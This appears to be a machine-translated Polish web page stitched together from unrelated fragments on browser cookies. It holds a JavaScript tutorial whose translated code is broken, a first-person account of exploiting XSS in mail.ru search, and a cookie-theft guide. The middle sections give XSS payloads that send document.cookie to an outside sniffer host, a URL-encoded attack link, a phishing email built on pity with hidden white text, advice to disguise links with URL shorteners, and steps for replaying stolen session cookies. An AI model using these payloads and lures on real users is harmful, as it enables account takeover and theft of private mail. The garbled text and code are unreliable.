Metody kradzieży plików cookies. Jak wyodrębnić hasło z pliku cookie. Do czego służą?


JavaScript umożliwia ustawienie i odczyt plików cookies w przeglądarce. W tej lekcji przyjrzymy się jak pracować z plikami cookies, a także stworzymy prostą stronę, która zapamięta wpisaną nazwę i wyświetli ją przy każdym logowaniu.

Co to są pliki cookie?

Pliki cookie to niewielka ilość danych przechowywanych przez przeglądarkę internetową. Umożliwiają przechowywanie określonych informacji o użytkowniku i pobieranie ich za każdym razem, gdy odwiedzi on Twoją stronę. Każdy użytkownik ma swój własny, unikalny zestaw plików cookie.

Zazwyczaj pliki cookies wykorzystywane są przez serwer WWW do realizacji takich funkcji jak śledzenie odwiedzin witryny, rejestracja w serwisie oraz przechowywanie informacji o zamówieniach lub zakupach. Nie musimy jednak wymyślać programu serwera WWW, aby korzystać z plików cookie. Możemy z nich korzystać za pomocą JavaScript.

Właściwość document.cookie.

W JavaScript dostęp do plików cookie uzyskuje się za pomocą właściwości cookie obiektu dokumentu. Możesz tworzyć pliki cookie w następujący sposób:

I zdobądź cały zapisany zestaw plików cookie w następujący sposób:

Var x = dokument.cookie;

Przyjrzyjmy się bardziej szczegółowo zapisywaniu i pobieraniu plików cookie.

Zapisywanie plików cookie

Aby zapisać plik cookie, musimy przypisać document.cookie do ciągu tekstowego zawierającego właściwości pliku cookie, który chcemy utworzyć:

document.cookie = " nazwa = wartość; wygasa = data; ścieżka = ścieżka; domena = domena; bezpieczne";

Właściwości opisano w tabeli:

Właściwość Opis Przykład
nazwa = wartość Ustawia nazwę pliku cookie i jego wartość. nazwa użytkownika=Wasia
wygasa = data Ustawia datę ważności plików cookie. Data musi mieć format zwracany przez metodę toGMTString() obiektu Date. Jeśli nie określono terminu wygaśnięcia, plik cookie zostanie usunięty po zamknięciu przeglądarki. wygasa=
13/06/2003 00:00:00
ścieżka = ścieżka Ta opcja ustawia ścieżkę w witrynie, w której obowiązuje plik cookie. Tylko dokumenty z określonej ścieżki mogą pobrać wartość pliku cookie. Zwykle ta właściwość pozostaje pusta, co oznacza, że ​​dostęp do niej może uzyskać tylko dokument, który ustawił plik cookie. ścieżka=/demo/
domena=domena Opcja ta umożliwia ustawienie domeny, w ramach której działa plik cookie. Tylko witryny z określonej domeny mogą otrzymać wartość pliku cookie. Zazwyczaj ta właściwość pozostaje pusta, co oznacza, że ​​dostęp do niej może uzyskać tylko domena, która ustawiła plik cookie. domena=strona internetowa
bezpieczne Ta opcja informuje przeglądarkę, aby korzystała z protokołu SSL w celu wysyłania plików cookie na serwer. Bardzo rzadko używany. bezpieczne

Zobaczmy przykład ustawienia plików cookie:

document.cookie = "nazwa użytkownika=Wasia; wygasa=15.02.2011 00:00:00";

Ten kod ustawia plik cookie nazwy użytkownika i przypisuje mu wartość „Vasya”, która będzie przechowywana do 15 lutego 2011 r. (stosowany jest europejski format czasu!).

var cookie_date = nowa data (2003, 01, 15); document.cookie = "nazwa użytkownika=Vasya; wygasa=" + cookie_date.toGMTString();

Ten kod robi dokładnie to samo, co w poprzednim przykładzie, ale używa metody Date.toGMTString() do ustawienia daty. Należy pamiętać, że numeracja miesięcy w obiekcie Date zaczyna się od 0, czyli luty to 01.

Document.cookie = "logged_in=tak";

Ten kod ustawia plik cookie zalogowanego użytkownika i ustawia go na „tak”. Ponieważ atrybut wygaśnięcia nie jest ustawiony, plik cookie zostanie usunięty po zamknięciu przeglądarki.

var cookie_date = nowa data(); // Bieżąca data i godzina cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = "logged_in=; wygasa=" + cookie_date.toGMTString();

Ten kod ustawia plik cookie zalogowanego i ustawia ciąg przechowywania na czas o jedną sekundę przed bieżącym czasem - ta operacja natychmiast usunie plik cookie. Ręczny sposób usuwania plików cookie!

Przekodowanie wartości pliku cookie!

Wartość pliku cookie musi zostać przekodowana, aby poprawnie przechowywać i wyświetlać znaki, takie jak spacja i dwukropek. Ta operacja gwarantuje, że przeglądarka poprawnie zinterpretuje wartość. Przekodowanie Lego odbywa się za pomocą funkcji JavaScript escape(). Na przykład:

document.cookie = "username=" + escape("Vasya Pupkin") + "; wygasa=15.02.2003 00:00:00"; Funkcja ustawiania plików cookies

Ustawianie plików cookie będzie łatwiejsze, jeśli napiszemy specjalną funkcję, która wykona proste operacje, takie jak przekodowanie wartości i skonstruowanie ciągu document.cookie. Na przykład:

Funkcja set_cookie (nazwa, wartość, exp_y, exp_m, exp_d, ścieżka, domena, bezpieczne) ( var cookie_string = nazwa + "=" + ucieczka (wartość); if (exp_y) ( var wygasa = nowa data (exp_y, exp_m, exp_d ); cookie_string += "; wygasa=" + wygasa.toGMTString(); ) if (ścieżka) cookie_string += "; ścieżka=" + ucieczka (ścieżka); if (domena) ciąg_ciasteczka += "; domena=" + ucieczka (domena); if (bezpieczny) ciąg_ciasteczek += "; bezpieczny"; dokument.cookie = ciąg_ciasteczek )

Funkcja przyjmuje dane z pliku cookie jako argumenty, następnie konstruuje odpowiedni ciąg i ustawia plik cookie.

Na przykład ustawienie plików cookie bez daty ważności:

set_cookie("nazwa użytkownika", "Wasia Pupkin"); set_cookie („nazwa użytkownika”, „Wasia Pupkin”, 2011, 01, 15);

Ustawianie plików cookies z okresem przechowywania, domeną serwisu, przy użyciu protokołu SSL, ale bez ścieżki:

set_cookie („nazwa użytkownika”, „Wasia Pupkin”, 2003, 01, 15, „”, „strona”, „bezpieczne”); Funkcja usuwania plików cookies.

Poniżej przedstawiona została kolejna przydatna funkcja do pracy z plikami cookies. Funkcja „usuwa” pliki cookies z przeglądarki ustawiając datę ważności na jedną sekundę wcześniejszą od aktualnej wartości czasu.

funkcja Delete_cookie (cookie_name) ( var cookie_date = new Date (); // Bieżąca data i godzina cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = nazwa_pliku cookie += "=; wygasa=" + cookie_date.toGMTString ();

Aby skorzystać z tej funkcji wystarczy podać nazwę pliku cookie, który ma zostać usunięty:

Usuń_cookie("nazwa użytkownika");

Uzyskiwanie wartości pliku cookie

Aby uzyskać wartość wstępnie ustawionego pliku cookie dla bieżącego dokumentu, należy skorzystać z właściwości document.cookie:

Var x = dokument.cookie;

Zwraca to ciąg składający się z listy par nazwa/wartość oddzielonych średnikami wszyscy pliki cookie ważne dla bieżącego dokumentu. Na przykład:

„nazwa użytkownika=Wasia; hasło=abc123”

W tym przykładzie ustawione są 2 pliki cookie: nazwa użytkownika o wartości „Vasya” i hasło o wartości „abc123”.

Funkcja pobierająca wartość pliku cookie

Zazwyczaj potrzebujemy tylko wartości jednego pliku cookie na raz. Dlatego użycie ciągu cookie nie jest wygodne! Oto funkcja, która przetwarza ciąg document.cookies , zwracając tylko te pliki cookie, które są w danym momencie interesujące:

Funkcja get_cookie (nazwa_ciasteczka) ( varresults = document.cookie.match („(^|;) ?” + nazwa_ciasteczka + „=([^;]*)(;|$)”); if (results) return (unescape (wyniki)); w przeciwnym razie zwróć wartość null)

Ta funkcja używa wyrażenia regularnego do znalezienia nazwy interesującego pliku cookie, a następnie zwraca wartość, która jest przetwarzana przez funkcję unescape() w celu ponownego zakodowania jej do normalnej postaci znakowej. (Jeśli plik cookie nie zostanie znaleziony, zwracana jest wartość null.)

Ta funkcja jest łatwa w użyciu. Na przykład, aby zwrócić wartość pliku cookie nazwy użytkownika:

Var x = get_cookie("nazwa użytkownika");

Prosty przykład użycia

W tym przykładzie stworzyliśmy stronę, która przy pierwszej wizycie pyta o Twoje imię i nazwisko, następnie zapisuje Twoje imię i nazwisko w pliku cookie i wyświetla je przy kolejnych wizytach.

Otwórz stronę w nowym oknie. Podczas pierwszej wizyty zostaniesz poproszony o podanie swojego imienia i nazwiska oraz zapisanie go w pliku cookie. Jeżeli ponownie odwiedzisz tę stronę, na ekranie wyświetli się nazwa pliku cookie, którą wpisałeś.

W przypadku plików cookies okres przechowywania ustalamy na 1 rok od aktualnej daty, co oznacza, że ​​przeglądarka zapisze Twoje imię i nazwisko, nawet jeśli ją zamkniesz.

Możesz wyświetlić kod strony w przeglądarce, wybierając opcję Wyświetl źródło. Oto główna część kodu:

if (! get_cookie („nazwa użytkownika”)) ( var nazwa użytkownika = zachęta („Wprowadź swoje imię i nazwisko”, „”); if (nazwa użytkownika) ( var bieżąca_data = nowa data; var cookie_rok = bieżąca_data.getFullYear () + 1; var cookie_miesiąc = bieżąca_data.getMonth(); var cookie_day = bieżąca_data.getDate(); set_cookie("nazwa użytkownika", nazwa użytkownika, rok_pliku cookie, miesiąc_pliku cookie, dzień_pliku cookie) ) else( var nazwa użytkownika = get_cookie("nazwa użytkownika"); dokument.write („Witajcie , " + nazwa użytkownika + ", witaj na stronie!"); document.write("
Zapomnij o mnie!"); }

Ta lekcja pokazała Ci, jak używać plików cookie w JavaScript do przechowywania informacji o odwiedzających. Dziękuję za uwagę! :)

W którym zaproponowano udział w bezpłatnym wydarzeniu poświęconym zagadnieniom bezpieczeństwa informacji. Ponieważ wydarzenie odbywało się w moim mieście, stwierdziłam, że koniecznie muszę się tam wybrać. Pierwsza lekcja poświęcona była podatnościom na stronach takich jak XSS. Po lekcji stwierdziłem, że muszę utrwalić zdobytą wiedzę w realnych warunkach. Wybrałem kilka witryn związanych z moim miastem i zacząłem próbować wstawić mój skrypt do wszystkich formularzy. W większości przypadków skrypt został odfiltrowany. Ale zdarzyło się, że uruchomił się „alarm” i pojawiła się moja wiadomość. Zgłosiłem znalezioną lukę administratorom, a oni szybko wszystko naprawili.

Któregoś dnia, sprawdzając najnowszą pocztę na mail.ru, moją uwagę przykuł formularz wyszukiwania listów w skrzynce pocztowej. Czasami korzystałem z tej wyszukiwarki, aby znaleźć coś, czego potrzebowałem w stosie moich starych listów. Cóż, ponieważ w ciągu ostatnich kilku dni wstawiłem mój „alarm” niemal wszędzie, gdzie się dało, moja ręka odruchowo sięgnęła po tę wyszukiwarkę. Wpisałem kod mojego skryptu i nacisnąłem Enter. Wyobraźcie sobie moje zdziwienie, gdy na ekranie zobaczyłam boleśnie znajomy komunikat...


Na wykładzie Open InfoSec Days prelegent powiedział, że programiści są dość sceptyczni w stosunku do tego typu luk, mówiąc „alarm? No i co? To nie jest niebezpieczne”. Jeśli na innych stronach zadowalałem się tylko tym okienkiem z moją wiadomością, to w tym przypadku postanowiłem pójść dalej i pokazać, co może wyniknąć z takiego „alarmu”.

Zatem skrypt działa, co oznacza, że ​​istnieje luka. Dlatego możesz spróbować uruchomić inny skrypt. Na przykład skrypt, który wysyła do nas pliki cookie innego użytkownika. Aby skrypt zadziałał musimy zmusić użytkownika do wykonania naszego skryptu. Można to zrobić wysyłając mu list z odpowiednim linkiem, po kliknięciu w który skrzynka pocztowa zostanie przeszukana i wykonany zostanie potrzebny nam kod.

Zrozumienie mechaniki tej luki zajęło trochę czasu i wiele eksperymentów. Czasem scenariusz działał, czasem był odfiltrowywany. Po pewnym wysiłku ustalono empirycznie, że skrypt działa w 100% tylko wtedy, gdy wyszukiwanie liter daje wynik pozytywny. Oznacza to, że gdy użytkownik przeszukuje nasz skrypt, konieczne jest, aby przynajmniej jedna litera w jego skrzynce pocztowej znalazła się zgodnie z określonymi parametrami. Zaaranżować to nie jest trudno.

Ponadto zamiast „alertu” potrzebujemy skryptu, który przekaże pliki cookie do naszego sniffera. Napiszemy ten skrypt w osobnym pliku i załadujemy go do naszej wyszukiwarki. Stworzyłem plik test.js z niezbędnym kodem i wrzuciłem go na hosting. Kod skryptu wygląda następująco:

Img=nowy obraz();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
funkcja F() (
lokalizacja="http://www.solife.ru";
}
setTimeout(F, 5000);

Co chciałbym tutaj wyjaśnić. Postawmy się w sytuacji napastnika. Potrzebujemy, aby użytkownik kliknął link. Jak go do tego zmusić? Możesz obiecać góry złota, a aby je otrzymać, kliknij nasz link do strony. Ale nie sądzę, że to zadziała. Ludzie już się na to nie nabierają (ja sam ciągle usuwam takie listy, nawet ich nie czytając). Dlatego będziemy grać na ludzkiej litości, ponieważ ona nadal istnieje w naturze. Prosimy o oddanie głosu na stronę ratującą zagrożone zwierzęta. Najpierw pobierzemy pliki cookies, a następnie przekierujemy użytkownika na stronę głosowania. Limit czasu przekierowania został ustawiony na 5 sekund, w przeciwnym razie pliki cookie po prostu nie miałyby czasu zostać przesłane do sniffera, a użytkownik zostałby natychmiast przekierowany na stronę o zwierzętach. Zamiast „alarmu” użyłem następującego skryptu:

Kiedy skończyłem scenariusz, zacząłem pisać list. Wymyśliłem coś takiego:


Okazało się to dość cyniczne, ale starałem się jak najbardziej zbliżyć warunki do rzeczywistości. Na końcu listu znajduje się linijka ze skryptem, ma to na celu odnalezienie naszego listu podczas wyszukiwania. Aby linia nie rodziła niepotrzebnych pytań, pomalowałam ją na biało. W słowie „http” umieściłem także spację, aby ciąg znaków nie został rozpoznany i zamieniony na link. W przeciwnym razie, mimo że linia skryptu jest napisana białą czcionką, link zostałby przez odbiorcę podświetlony na niebiesko, a nam to niepotrzebne. Inteligentne wyszukiwanie nadal znajdzie i rozpozna ten ciąg, pomimo spacji.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

W skrypcie użyłem kodowania adresu URL, aby nic nie zostało odfiltrowane. Do wyszukiwania dodałem także parametr „q_folder=0”, dzięki czemu wyszukiwanie odbywa się w folderze „Skrzynka odbiorcza”.

List jest gotowy, wysyłamy go. Korzystałem z drugiej skrzynki pocztowej w tej samej usłudze, co odbiorca. Zobaczmy, co przyszło do drugiego pudełka.

Nasz tekst skryptu nie jest widoczny, ponieważ wtapia się w tło. Kliknijmy link i zobaczmy, co się stanie. Użytkownik zostaje przeniesiony do wyników wyszukiwania wiadomości e-mail na podstawie określonego przez nas parametru. Nasz list, który wysłaliśmy, jest widoczny w wynikach wyszukiwania. W tej chwili nasz skrypt już zadziałał i wysłał pliki cookie użytkownika do sniffera. Po 5 sekundach (czas zależny od ustawień skryptu) użytkownik zostaje przekierowany na stronę głosowania.

Sprawdzam plik sniff.txt:

Ponieważ moim celem nie jest kradzież skrzynek innych osób ani uzyskiwanie do nich dostępu, zakończę tę historię w tym miejscu. Ale teoretycznie możesz zastąpić swoje pliki cookie cudzymi plikami cookie i uzyskać dostęp do cudzej skrzynki pocztowej. Ogólnie rzecz biorąc, jeśli atakujący jest zainteresowany celem, znajdzie zastosowanie dla otrzymanych informacji.

Chciałbym podziękować Siergiejowi Biełowowi (

Mój znajomy zapomniał hasła do jednej ze stron. Wcześniej jednak podczas logowania zaznaczył w przeglądarce Google Chrome opcję „Zapamiętaj mnie”, co umożliwiło mu dostęp do witryny znajdującej się w ramach jego konta. Otrzymałem pytanie czy jest możliwość przeniesienia tego magicznego stanu na inny komputer. Bardziej poprawna byłaby oczywiście zmiana lub przywrócenie hasła, ale mój przyjaciel nie mógł tego zrobić z powodów niezwiązanych ze sprawą.

Jak używać przechwytywacza dla manekinów

Pomimo różnorodności nowoczesnego oprogramowania do wyboru, trudno znaleźć lepsze programy hakerskie na Androida niż przechwytujące. Pierwszym kryterium przemawiającym na korzyść tego produktu jest jego faktyczne działanie. Większość snifferów oferowanych w sieci to po prostu imitacje, które nie spełniają swoich deklarowanych funkcji.

Kolejnymi pozytywnymi czynnikami są wszechstronność zastosowania i zasięg dla szerokiego grona użytkowników.

Pomoc komputerowa 939-29-71

Zacznijmy od porządku. Cookies lub „cookies” to bardzo małe pliki tekstowe – zakładki z informacjami.

Serwer WWW przesyła te informacje do przeglądarki użytkownika. gdzie informacje te są przechowywane do czasu, aż będą potrzebne. Mętnawy. Dobrze. Cienki.

Spróbuję uczynić to jeszcze prostszym. Patrzeć. zarejestrowałeś się na dowolnej stronie internetowej.

W momencie rejestracji tworzone są te same „cookies”.

Oto czym są.

Ciasteczkowy Cagger

Program nasłuchuje ruchu w sieci WiFi, przechwytuje pliki cookies i replikuje sesję użytkownika w Twojej przeglądarce, powtarzając żądania z jego danymi uwierzytelniającymi. Autor Matthew Sullivan przedstawił prezentację programu 30 września na konferencji hakerów w Derbycon. Zaraz podczas przemówienia Matthew Sullivan przechwycił niezabezpieczoną sesję jednego z gości konferencji z Google za pośrednictwem Wi-Fi.

Jak ukraść ciasteczka

Jeśli na stronie internetowej wpiszesz następujący tekst w pasku adresu przeglądarki Firefox lub Opera: javaсript:document.write(document.cookie); wtedy zobaczysz coś takiego: remixAdminsBar=0; typ grupy remiksów=0; remixpass=********************; remiksowanie=0; informacja o remiksie=0; remixMembersBar=0; opis remiksu=0; remiksautomatyczna zakładka=8; remiks e-mail=**********; remiksmid=23363; remikschk=5; remiksaudio=0; remixlinksBar=1; remiksOfficersBar=0; remiksZdjęćBar=0; remixTopicsBar=0; remiksyfilmów=0; remiksOstatnieWiadomości=0; remixAlbumsBar=0 Uwaga! .

Kompletny przewodnik po skryptach między witrynami

XSS to rodzaj luki w oprogramowaniu występującej natywnie w aplikacjach internetowych, która umożliwia atakującemu wstrzyknięcie skryptu po stronie klienta do stron internetowych przeglądanych przez innych użytkowników. Wikipedia definiuje XSS w następujący sposób: „Skrypty krzyżowe (XSS) to rodzaj natywnej luki w oprogramowaniu. do sieci WWW (poprzez obejście ograniczeń bezpieczeństwa przeglądarki)”, co umożliwia atakującemu wstrzyknięcie skryptu klienckiego na strony internetowe przeglądane przez innych użytkowników.

Różnica między plikami cookie a sesjami

Niedawno pisałem artykuł o tym jak rejestrować i autoryzować użytkowników w serwisie.

„. W tym artykule omówię różnicę między sesjami a plikami cookie. abyś w końcu mógł dokonać wyboru.

Ciasteczka. Nie, tu wcale nie chodzi o pliki cookies, chodzi o Twoje bezpieczeństwo. Idziesz więc na swoją ulubioną stronę „vkontakte” (lub na przykład przeglądasz pocztę) na czyimś komputerze, odrzucasz opcję „zapisz hasło”, szczęśliwie przeglądasz pocztę i wychodzisz. I nie myśl o tym, że możesz teraz logować się do sieci społecznościowej lub poczty elektronicznej pod swoim nazwiskiem.

Nawet nie rozważam sytuacji z programem, który pamięta hasło bez Twojej wiedzy. Jest to już celowy hack i prawdopodobnie będziesz podejrzewał, że coś takiego może się wydarzyć i nie wejdziesz na swoją ulubioną stronę na takim komputerze. Ale możemy mówić o zwykłej ludzkiej ciekawości - odwiedzałeś znajomych, a potem nagle dostali możliwość przeczytania Twojej poczty. Czy na pewno odmówią tej możliwości? Nie boisz się, że coś wyjdzie? W każdym razie odłożę na bok kwestie moralności i porozmawiam tylko o tym, w jaki sposób informacje są przechowywane na komputerze, dzięki czemu można teraz uzyskać dostęp do niektórych witryn bez pytania o hasło.

jak ukraść ciasteczko

A nazwa tej technologii to pliki cookie.

I tu wszystko się zaczęło. Protokół http, za pośrednictwem którego faktycznie przeglądasz strony (w tym tę), początkowo nie przewidywał możliwości utrzymania połączenia. Oznacza to, że z grubsza wysyłasz żądanie do witryny, otrzymujesz odpowiedź, jest ona wyświetlana na ekranie, a następnie serwer nic o Tobie nie pamięta. To oczywiście jest dobre, gdy strona ma charakter wyłącznie informacyjny i nie powinna nic o Tobie pamiętać, ale żyjemy w epoce Web 2.0 😉 Naturalnym rozwojem protokołu są żądania POST i GET, kiedy wysyłasz jakieś dane, serwer może zapisać to do danych bazy danych, ale to nie wystarczy.

Spójrzmy na bardzo prosty przykład. Forum. Więc zarejestrowałeś się, a na forum jest post, że jest taki a taki użytkownik z takim a takim hasłem i jakimiś innymi dodatkowymi danymi. Ale teraz idziesz na forum i logujesz się - wprowadź swoje hasło. Gdzieś powinna być informacja, że ​​jesteś zalogowany. Na serwerze? Oczywiście nie! Nie ma możliwości zapisania na serwerze informacji o tym, że autoryzacja została dokonana z Twojego komputera - nie będzie to w stanie odróżnić Cię od kogoś innego (nawet Twój adres IP nie będzie Cię jednoznacznie identyfikował)! Dlatego informacja o dokonaniu autoryzacji musi być przechowywana na Twoim komputerze. Po to właśnie są ciasteczka, po to zostały stworzone.

Plik cookie to niewielki zapis na Twoim komputerze, w którym przechowywane są informacje o odwiedzonej witrynie. Kiedy się zalogujesz, tworzony jest podobny wpis, po którym możesz chodzić po forum, a ono Cię rozpozna. Jednak będzie to już odbywać się automatycznie – dzięki informacjom zapisanym w pliku cookie – więc udawanie, że jesteś głównym administratorem forum, w dalszym ciągu nie będzie działać z pominięciem sprawdzania hasła.

Teraz możemy wrócić do miejsca, w którym zaczął się ten artykuł. Jeśli zalogowałeś się gdzieś bez zapisywania hasła, może się zdarzyć, że na komputerze został utworzony wpis, który umożliwia teraz zalogowanie się do tego zasobu pod Twoim imieniem i nazwiskiem bez autoryzacji. Sam taki wpis po pewnym czasie stanie się nieaktualny, ale możesz wymusić jego wyczyszczenie. Każda przeglądarka robi to inaczej, pokażę Ci jak można to zrobić w mojej ulubionej przeglądarce Google Chrome. Otwarcie parametrów

Przejdź do zakładki „zaawansowane” i znajdź przycisk „pokaż pliki cookie”.

Teraz oczywiście możesz usunąć wszystkie pliki cookie, ale może to zdenerwować właściciela komputera. Dlatego np. w górnym polu możesz wpisać nazwę interesującej Cię witryny

Następnie możesz wyczyścić tylko pliki cookie związane z tą witryną. Możesz spróbować na moim. Jeśli jednak zalogujesz się na moje forum, a następnie wyczyścisz pliki cookie, dane logowania zostaną zapomniane. Spróbuj!

komentarze zasilane przez

1.Co to jest XSS?
Luka XSS umożliwia wstawienie dowolnego kodu JavaScript w treści strony. Atak XSS różni się od innych (na przykład iniekcji SQL lub iniekcji PHP) tym, że wpływa na klienta, a nie na serwer.

jak ukraść ciasteczka

Za jego pomocą nie można przeglądać tabel bazy danych, ładować powłoki itp. Najczęstszym zastosowaniem XSS jest kradzież plików cookie.
Pliki cookie to niewielka część danych tworzona przez serwer internetowy i przechowywana na komputerze użytkownika w postaci pliku. Zazwyczaj pliki cookies służą do przechowywania kont i najczęściej zawierają zaszyfrowane hasło, login i identyfikator sesji (choć nie zawsze)
XSS występuje w dwóch typach, aktywnym i pasywnym.

Pasywny XSS wymaga bezpośredniego udziału ofiary, na przykład kliknięcia łącza zawierającego kod JavaScript. Korzystając z tego typu XSS, nie można obejść się bez SI (inżynierii społecznej)

Aktywny XSS nie wymaga żadnego udziału ofiary; wystarczy, że odwiedzi stronę zawierającą XSS. Aktywny XSS może być np. w wiadomościach na forach, czatach, dodawaniu aktualności itp.

2. Wyszukaj XSS
W tym akapicie powiem ci, jak znaleźć xss

2.1.Pasywny XSS
Aby znaleźć pasywny XSS, po prostu zamień alert('xss') w formularzu wejściowym, jeśli skrypt zadziałał i pojawi się komunikat "xss", oznacza to, że luka jest obecna, jeśli skrypt nie zadziała, możesz także spróbować ">alert (), jest to prawdopodobnie najczęstsza luka w zabezpieczeniach xss. Jeśli ani jeden, ani drugi skrypt nie zadziałał, najprawdopodobniej nie ma żadnej luki.
Spójrzmy na przykład.
http://miss.rambler.ru/srch/?sort=0&… amp;words=
Czy widzisz formularz „szukaj”? wstaw tam „>alert()” i kliknij „znajdź”
Pojawi się okno z xss, co oznacza, że ​​xss jest obecny (być może do czasu przeczytania tego artykułu ten xss będzie już usunięty).

2.2.Aktywny XSS
Taki css może znajdować się np. w polach profilu, przy dodawaniu newsa w tytule newsa oraz w samym newsie (rzadziej), w wiadomościach na forach/czatach/pokojach gościnnych z włączoną obsługą HTML. Tutaj wszystko jest proste, wpisujemy w odpowiednie pola skrypt z poprzedniego akapitu i jeśli na ekranie wyświetli się komunikat, oznacza to, że podatność występuje.
Przyjrzyjmy się xss w tagach BB na forach.
Możesz spróbować po prostu wstawić kod JavaScript do tagu, na przykład tak:
javascript:alert('xss')
Niektóre tagi mają parametry, na przykład tag ma parametry dynsrc i lowsrc, spróbujmy zastąpić kod w ten sposób:
http://www.site.ru/image.jpg dynsrc=javascript:alert(‘xss’)
Jeśli skrypt zadziałał, pojawi się xss

3. Używanie XSS do kradzieży plików cookie
Teraz najsmaczniejsze))))
Aby ukraść pliki cookie, potrzebujemy sniffera sieciowego, możesz zainstalować jakiś sniffer na swoim hostingu lub możesz użyć sniffera online, którego jest teraz mnóstwo.
Aby ukraść pliki cookie za pomocą pasywnego XSS, ofiara musi skorzystać z trującego łącza. Aby ukraść pliki cookie, zamiast alert('xss') użyjemy innego skryptu:
img = nowy obraz();


podstawiamy skrypt do linku i pozwalamy ofierze podążać za nim, przeglądać dziennik sniffera i cieszyć się.
Spójrzmy na przykład.
Weźmy XSS na Ramblerze z poprzedniego akapitu.
Wstawiamy
">
img = nowy obraz();
img.src = "adres obrazu sniffera"+document.cookie;

w formularzu wyszukiwania kliknij „znajdź”, spójrz na pasek adresu i zobacz:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Wysyłamy ten link ofierze i cieszymy się plikami cookie.
Widząc taki link, ofiara może coś podejrzewać, dlatego wskazane jest zakodowanie
">img = nowy obraz();img.src = "adres obrazu sniffera"+document.cookie;
w adresie URL Lub skorzystaj z usług takich jak http://tinyurl.com/
Przejdźmy do aktywnego XSS, tutaj wszystko jest proste, zamiast alert() wstawiamy img = new Image();img.src = "adres obrazu sniffera"+document.cookie;

Teraz mamy ciasteczka. Ale co z nimi zrobić? To proste, musisz je zastąpić zamiast własnego. Przeglądarka Opera ma wbudowany edytor plików cookies (narzędzia->zaawansowane->zarządzanie plikami cookies), jest wtyczka do Firefoksa (nie pamiętam jak się to nazywa, użyj Google)
Na razie tyle, być może artykuł zostanie uzupełniony

Opera otwórz menu główne, przejdź do sekcji „Ustawienia” i wybierz wiersz „Ustawienia ogólne…”. Możesz też po prostu nacisnąć klawisze skrótu CTRL + F12. Spowoduje to otwarcie okna ustawień przeglądarki, gdzie w zakładce „Zaawansowane” należy kliknąć sekcję „Pliki cookie” w lewym panelu. W nim należy kliknąć przycisk „Zarządzaj plikami cookie”.

W przeglądarce Mozilla FireFox otwórz sekcję „Narzędzia” w menu i wybierz „Ustawienia”. W oknie ustawień należy przejść do zakładki „Prywatność”, znaleźć tam przycisk „Pokaż pliki cookie...” i kliknąć go, aby uzyskać dostęp do listy plików cookie przechowywanych przez przeglądarkę. Możesz je wyszukiwać i przeglądać tutaj.

W przeglądarce Internet Explorer rozwiń sekcję „Narzędzia” w menu i wybierz „Właściwości”. W oknie ustawień Właściwości przejdź do zakładki „Ogólne” i kliknij przycisk „Opcje” w sekcji „Historia przeglądania”. Otworzysz w ten sposób kolejne okno („Opcje plików tymczasowych”), w którym należy kliknąć przycisk „Pokaż pliki”.

Kliknij nagłówek „Nazwa” na liście zawartości folderu przechowywania plików tymczasowych przeglądarki Internet Explorer, który zostanie otwarty — w ten sposób możesz zgrupować wszystkie pliki cookie w jeden blok we wspólnej stercie heterogenicznych plików. Tutaj możesz znaleźć interesujący Cię plik i otworzyć go w standardowym Notatniku w celu przeglądania lub edycji.

W przeglądarce Google Chrome kliknij ikonę klucza w prawym górnym rogu okna i z menu wybierz Opcje. Przeglądarka otworzy stronę „Ustawienia”, kliknij link „Zaawansowane” w lewym panelu, a na stronie ustawień zaawansowanych kliknij przycisk „Ustawienia treści”. To nie jest ostatnia strona na drodze do plików cookies zapisywanych przez tę przeglądarkę.

Kliknij przycisk „Wszystkie pliki cookie i dane witryn” na następnej stronie, a będziesz mieć wreszcie dostęp do listy plików cookie.

Przeglądarka Google Chrome umożliwia wyszukiwanie, przeglądanie i usuwanie plików cookie.

W przeglądarce Safari kliknij ikonę koła zębatego w prawym górnym rogu i wybierz „Ustawienia…”. W oknie zmiany ustawień należy przejść do zakładki „Bezpieczeństwo” i kliknąć tam przycisk „Pokaż pliki cookie”. Safari udostępnia jedynie funkcje wyszukiwania i usuwania plików cookie; zawartość tych plików tymczasowych jest tutaj widoczna tylko częściowo.

Ciasteczka- informacje w formie pliku tekstowego zapisywane przez serwis na komputerze użytkownika. Zawiera dane uwierzytelniające (login/hasło, identyfikator, numer telefonu, adres skrzynki pocztowej), ustawienia użytkownika, status dostępu. Przechowywane w profilu przeglądarki.

Hakowanie plików cookie to kradzież (lub „przejęcie”) sesji osoby odwiedzającej zasoby sieciowe. Prywatne informacje stają się dostępne nie tylko dla nadawcy i odbiorcy, ale także dla strony trzeciej – osoby, która przeprowadziła przechwycenie.

Narzędzia i techniki hakowania plików cookie

Złodzieje komputerowi, podobnie jak ich koledzy w prawdziwym życiu, oprócz umiejętności, zręczności i wiedzy, mają oczywiście także własne narzędzia - rodzaj arsenału kluczy głównych i sond. Przyjrzyjmy się najpopularniejszym sztuczkom, których używają hakerzy, aby wyodrębnić pliki cookie od użytkowników Internetu.

Sniffery

Specjalne programy do monitorowania i analizy ruchu sieciowego. Ich nazwa pochodzi od angielskiego czasownika „sniff” (sniff), ponieważ. dosłownie „wyszukuje” pakiety przesyłane pomiędzy węzłami.

Jednak osoby atakujące używają sniffera do przechwytywania danych sesji, wiadomości i innych poufnych informacji. Celem ich ataków są głównie niezabezpieczone sieci, do których pliki cookies wysyłane są w otwartej sesji HTTP, czyli praktycznie nie są szyfrowane. (Publiczne Wi-Fi jest pod tym względem najbardziej podatne na zagrożenia.)

Aby osadzić sniffera w kanale internetowym pomiędzy węzłem użytkownika a serwerem WWW, stosuje się następujące metody:

  • „nasłuchiwanie” interfejsów sieciowych (koncentratorów, przełączników);
  • rozgałęzianie i kopiowanie ruchu;
  • łączenie się z luką w kanale sieciowym;
  • analiza poprzez specjalne ataki, które przekierowują ruch ofiary do sniffera (podrabianie adresów MAC, fałszowanie adresów IP).

Skrót XSS oznacza Cross Site Scripting. Służy do atakowania stron internetowych w celu kradzieży danych użytkownika.

Zasada XSS jest następująca:

  • osoba atakująca wstawia złośliwy kod (specjalny ukryty skrypt) na stronie internetowej, forum lub w wiadomości (na przykład podczas korespondencji w sieci społecznościowej);
  • ofiara przechodzi na zainfekowaną stronę i aktywuje zainstalowany kod na swoim komputerze (klika, korzysta z łącza itp.);
